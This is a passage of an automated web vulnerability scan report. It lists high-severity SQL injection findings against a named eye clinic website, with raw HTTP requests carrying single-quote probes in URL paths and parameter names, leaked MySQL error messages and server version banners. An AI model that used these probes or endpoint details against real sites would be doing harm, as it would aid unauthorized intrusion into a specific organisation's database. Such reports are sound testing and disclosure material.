GET /aboutus.htm?1''=1 HTTP/1.1 Host: www.baysideeyes.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:37 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 5388
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equi ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /cmsAdmin'/uploads/BLEPHARITIS.pdf&s=204.93 HTTP/1.1 Host: www.baysideeyes.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 21:53:16 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 196
MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') ORDER BY old_url DESC LIMIT 1' at line 3
Request 2
GET /cmsAdmin''/uploads/BLEPHARITIS.pdf&s=204.93 HTTP/1.1 Host: www.baysideeyes.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 21:53:16 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 5388
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equi ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /cmsAdmin/uploads'/BLEPHARITIS.pdf&s=204.93 HTTP/1.1 Host: www.baysideeyes.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 21:53:17 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 196
MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') ORDER BY old_url DESC LIMIT 1' at line 3
Request 2
GET /cmsAdmin/uploads''/BLEPHARITIS.pdf&s=204.93 HTTP/1.1 Host: www.baysideeyes.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 21:53:17 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 5388
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equi ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /cmsAdmin/uploads/BLEPHARITIS.pdf'&s=204.93 HTTP/1.1 Host: www.baysideeyes.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 21:53:17 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 196
MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') ORDER BY old_url DESC LIMIT 1' at line 3
Request 2
GET /cmsAdmin/uploads/BLEPHARITIS.pdf''&s=204.93 HTTP/1.1 Host: www.baysideeyes.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 21:53:18 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 5388
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equi ...[SNIP]...
1.15. http://www.baysideeyes.com.au/cmsAdmin/uploads/BLEPHARITIS.pdf&s=204.93 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.baysideeyes.com.au
Path:
/cmsAdmin/uploads/BLEPHARITIS.pdf&s=204.93
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /cmsAdmin/uploads/BLEPHARITIS.pdf&s=204.93?1'=1 HTTP/1.1 Host: www.baysideeyes.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 21:53:12 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 196
MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') ORDER BY old_url DESC LIMIT 1' at line 3
Request 2
GET /cmsAdmin/uploads/BLEPHARITIS.pdf&s=204.93?1''=1 HTTP/1.1 Host: www.baysideeyes.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 21:53:13 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 5388
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equi ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /cmsAdmin'/uploads/privacy.htm HTTP/1.1 Host: www.baysideeyes.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:19 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 196
MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') ORDER BY old_url DESC LIMIT 1' at line 3
Request 2
GET /cmsAdmin''/uploads/privacy.htm HTTP/1.1 Host: www.baysideeyes.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:20 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 5388
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equi ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /cmsAdmin/uploads'/privacy.htm HTTP/1.1 Host: www.baysideeyes.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:23 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 196
MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') ORDER BY old_url DESC LIMIT 1' at line 3
Request 2
GET /cmsAdmin/uploads''/privacy.htm HTTP/1.1 Host: www.baysideeyes.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:24 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 5388
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equi ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /cmsAdmin/uploads/privacy.htm' HTTP/1.1 Host: www.baysideeyes.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:29 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 226
MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''cmsAdmin/uploads/privacy.htm'') ORDER BY old_url DESC LIMIT 1' at line 3
Request 2
GET /cmsAdmin/uploads/privacy.htm'' HTTP/1.1 Host: www.baysideeyes.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:30 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 5388
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equi ...[SNIP]...
1.19. http://www.baysideeyes.com.au/cmsAdmin/uploads/privacy.htm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.baysideeyes.com.au
Path:
/cmsAdmin/uploads/privacy.htm
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /cmsAdmin/uploads/privacy.htm?1'=1 HTTP/1.1 Host: www.baysideeyes.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:01 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 196
MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') ORDER BY old_url DESC LIMIT 1' at line 3
Request 2
GET /cmsAdmin/uploads/privacy.htm?1''=1 HTTP/1.1 Host: www.baysideeyes.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:01 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 5388
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equi ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /favicon.ico' HTTP/1.1 Host: www.baysideeyes.com.au Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''favicon.ico'') ORDER BY old_url DESC LIMIT 1' at line 3
Request 2
GET /favicon.ico'' HTTP/1.1 Host: www.baysideeyes.com.au Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equi ...[SNIP]...
1.21. http://www.baysideeyes.com.au/favicon.ico [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.baysideeyes.com.au
Path:
/favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /favicon.ico?1'=1 HTTP/1.1 Host: www.baysideeyes.com.au Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') ORDER BY old_url DESC LIMIT 1' at line 3
Request 2
GET /favicon.ico?1''=1 HTTP/1.1 Host: www.baysideeyes.com.au Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /referrer-information.htm' HTTP/1.1 Host: www.baysideeyes.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:55 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 222
MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''referrer-information.htm'') ORDER BY old_url DESC LIMIT 1' at line 3
Request 2
GET /referrer-information.htm'' HTTP/1.1 Host: www.baysideeyes.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:56 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 5388
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equi ...[SNIP]...
1.23. http://www.baysideeyes.com.au/referrer-information.htm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.baysideeyes.com.au
Path:
/referrer-information.htm
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /referrer-information.htm?1'=1 HTTP/1.1 Host: www.baysideeyes.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:38 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 196
MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') ORDER BY old_url DESC LIMIT 1' at line 3
Request 2
GET /referrer-information.htm?1''=1 HTTP/1.1 Host: www.baysideeyes.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:39 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 5388
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equi ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /sitemap.htm' HTTP/1.1 Host: www.baysideeyes.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:37 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 209
MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''sitemap.htm'') ORDER BY old_url DESC LIMIT 1' at line 3
Request 2
GET /sitemap.htm'' HTTP/1.1 Host: www.baysideeyes.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:38 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 5388
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equi ...[SNIP]...
1.25. http://www.baysideeyes.com.au/sitemap.htm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.baysideeyes.com.au
Path:
/sitemap.htm
Issue detail
